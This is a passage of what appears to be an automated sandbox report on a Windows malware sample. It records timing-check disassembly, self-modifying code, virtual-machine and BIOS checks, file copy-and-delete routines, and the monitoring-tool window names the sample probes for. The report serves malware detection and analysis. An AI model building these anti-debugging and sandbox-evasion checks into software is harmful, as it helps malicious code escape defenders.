                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF39F2 second address: CF3A0A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F996107E1C2h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3A0A second address: CF3A17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnc 00007F99607DC0C6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34918 second address: C3494B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jg 00007F996107E1B6h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F996107E1C8h 0x00000014 popad 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jnl 00007F996107E1B8h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3B90 second address: CF3B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF42CA second address: CF42D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7D22 second address: CF7D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop esi 0x0000000b jmp 00007F99607DC0D1h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7D42 second address: CF7D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7D46 second address: CF7D6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jbe 00007F99607DC0C6h 0x00000010 jmp 00007F99607DC0D7h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7D6E second address: CF7D96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1BBh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F996107E1C7h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7D96 second address: CF7DA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFCCB7 second address: CFCCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F996107E1B6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F996107E1C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFCCDD second address: CFCCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 jmp 00007F99607DC0D8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC71D second address: CFC729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC8A2 second address: CFC8B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0CBh 0x00000007 jnc 00007F99607DC0C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10701 second address: D10705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10705 second address: D1070B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D152F7 second address: D15314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15314 second address: D15358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0CFh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F99607DC0D4h 0x00000012 jmp 00007F99607DC0D9h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15358 second address: D15362 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F996107E1B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C8FC second address: D1C905 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C905 second address: D1C90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C775 second address: D1C78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007F99607DC0CAh 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C78A second address: D1C78E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C78E second address: D1C798 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99607DC0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C798 second address: D1C7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F996107E1B6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D277DB second address: D2780A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c je 00007F99607DC0C6h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push esi 0x00000018 jns 00007F99607DC0C6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2780A second address: D27820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push ebx 0x00000007 pushad 0x00000008 jmp 00007F996107E1BAh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27820 second address: D27829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27829 second address: D2782D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2782D second address: D27833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26004 second address: D26015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F996107E1BCh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26015 second address: D26030 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0D4h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D266B6 second address: D266E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push edx 0x00000009 jmp 00007F996107E1C2h 0x0000000e jmp 00007F996107E1BAh 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F996107E1B6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2685C second address: D26870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0CCh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D269D3 second address: D269D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D269D7 second address: D269E1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99607DC0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D269E1 second address: D269FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F996107E1C4h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D269FB second address: D26A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F99607DC0C6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A5FF second address: D2A603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A603 second address: D2A607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A607 second address: D2A628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F996107E1BDh 0x0000000b jc 00007F996107E1B8h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3EAA9 second address: C3EAB9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99607DC0C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3EAB9 second address: C3EABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A353 second address: D2A357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34618 second address: D3461E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A117 second address: D4A12D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F99607DC0CEh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A12D second address: D4A159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1C8h 0x00000007 jo 00007F996107E1B8h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A159 second address: D4A17B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jo 00007F99607DC0C6h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59BB5 second address: D59BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59BBC second address: D59BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ecx 0x00000008 je 00007F99607DC0E0h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59BCE second address: D59BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59BD2 second address: D59BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F99607DC0CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59FFB second address: D5A001 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A001 second address: D5A01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0D7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A2DC second address: D5A2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F996107E1B6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F996107E1C3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A47A second address: D5A480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A929 second address: D5A93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F996107E1B6h 0x0000000a jnc 00007F996107E1B6h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EBF7 second address: D5EBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EBFB second address: D5EBFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F19B second address: D5F1A9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99607DC0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F1A9 second address: D5F1AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F1AD second address: D5F1BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F99607DC0C8h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F1BF second address: D5F1D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F996107E1C6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F1D9 second address: D5F205 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F99607DC0D2h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jo 00007F99607DC0C6h 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60C7C second address: D60C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F996107E1B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60C88 second address: D60CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0D1h 0x00000009 popad 0x0000000a jo 00007F99607DC0CEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60890 second address: D60894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60894 second address: D6089A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D62788 second address: D6278C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6278C second address: D62796 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F99607DC0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C02E6 second address: 53C0303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ch, dh 0x0000000f mov dh, ch 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0303 second address: 53C0309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0309 second address: 53C030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C030D second address: 53C032B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e call 00007F99607DC0CEh 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C038B second address: 53C038F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AD1AFF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AD1BCB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AD1B31 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C705AF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ACF01E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C98FE7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_008838B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00884910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00884910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0087DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0087E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0087ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00884570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00884570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087F68A FindFirstFileA,0_2_0087F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00883EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00883EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0087F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008716D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0087DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0087BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00871160 GetSystemInfo,ExitProcess,0_2_00871160
                Source: file.exe, file.exe, 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware"U
                Source: file.exe, 00000000.00000002.2117561798.0000000001602000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2117561798.0000000001632000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13402
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13399
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13413
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13417
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13453
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
